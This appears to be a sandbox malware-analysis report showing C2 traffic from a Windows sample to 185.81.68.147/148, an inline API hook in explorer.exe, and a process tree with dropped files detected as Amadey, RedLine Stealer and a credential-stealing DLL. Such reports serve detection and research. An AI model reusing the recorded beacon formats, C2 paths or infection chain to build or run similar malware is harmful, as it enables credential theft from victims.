                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                144192.168.2.1150117185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:24.070517063 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:24.190712929 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:25.694834948 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:24 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                145192.168.2.1150118185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:25.372050047 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:26.705961943 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:25 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                146192.168.2.1150119185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:25.573188066 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:21:26.894267082 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:26 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                147192.168.2.1150120185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:25.930139065 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:26.050694942 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:27.416011095 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:26 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                148192.168.2.1150121185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:27.651650906 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:21:27.771655083 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:21:29.160310030 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:28 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                149192.168.2.1150122185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:21:28.843250990 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:21:30.189109087 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:21:29 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                                CreateProcessInternalWINLINEexplorer.exe
                                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                                CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5F

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:02:18:39
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\mggoBrtk9t.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\mggoBrtk9t.exe"
                                                                                                                                                                                                Imagebase:0x7ff7cdc40000
                                                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                                                MD5 hash:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:02:18:39
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                Imagebase:0x7ff6fdb50000
                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:02:18:39
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3800744010.0000021C7EC7D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:02:18:39
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                Imagebase:0x7ff63b520000
                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:02:18:39
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                Imagebase:0x7ff611de0000
                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000000.1347856091.000000000AFF0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:02:18:50
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe"
                                                                                                                                                                                                Imagebase:0x7ff673520000
                                                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                                                MD5 hash:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:02:18:50
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:02:18:50
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                Imagebase:0x7ff6fdb50000
                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                Start time:02:18:50
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                Imagebase:0x7ff63b520000
                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:02:18:58
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe"
                                                                                                                                                                                                Imagebase:0x7ff7102c0000
                                                                                                                                                                                                File size:5'915'948 bytes
                                                                                                                                                                                                MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:02:18:59
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe"
                                                                                                                                                                                                Imagebase:0x7ff673520000
                                                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                                                MD5 hash:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:02:18:59
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                Imagebase:0x7ff6fdb50000
                                                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:02:18:59
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:02:18:59
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                Imagebase:0x7ff63b520000
                                                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:02:19:00
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe"
                                                                                                                                                                                                Imagebase:0x7ff7102c0000
                                                                                                                                                                                                File size:5'915'948 bytes
                                                                                                                                                                                                MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:02:19:00
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe"
                                                                                                                                                                                                Imagebase:0x7b0000
                                                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                                                MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 68%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:02:19:05
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe"
                                                                                                                                                                                                Imagebase:0x4b0000
                                                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:02:19:06
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:02:19:06
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:02:20:01
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:02:20:09
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:02:20:09
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                                                Imagebase:0x7ff7e39d0000
                                                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:02:20:09
                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
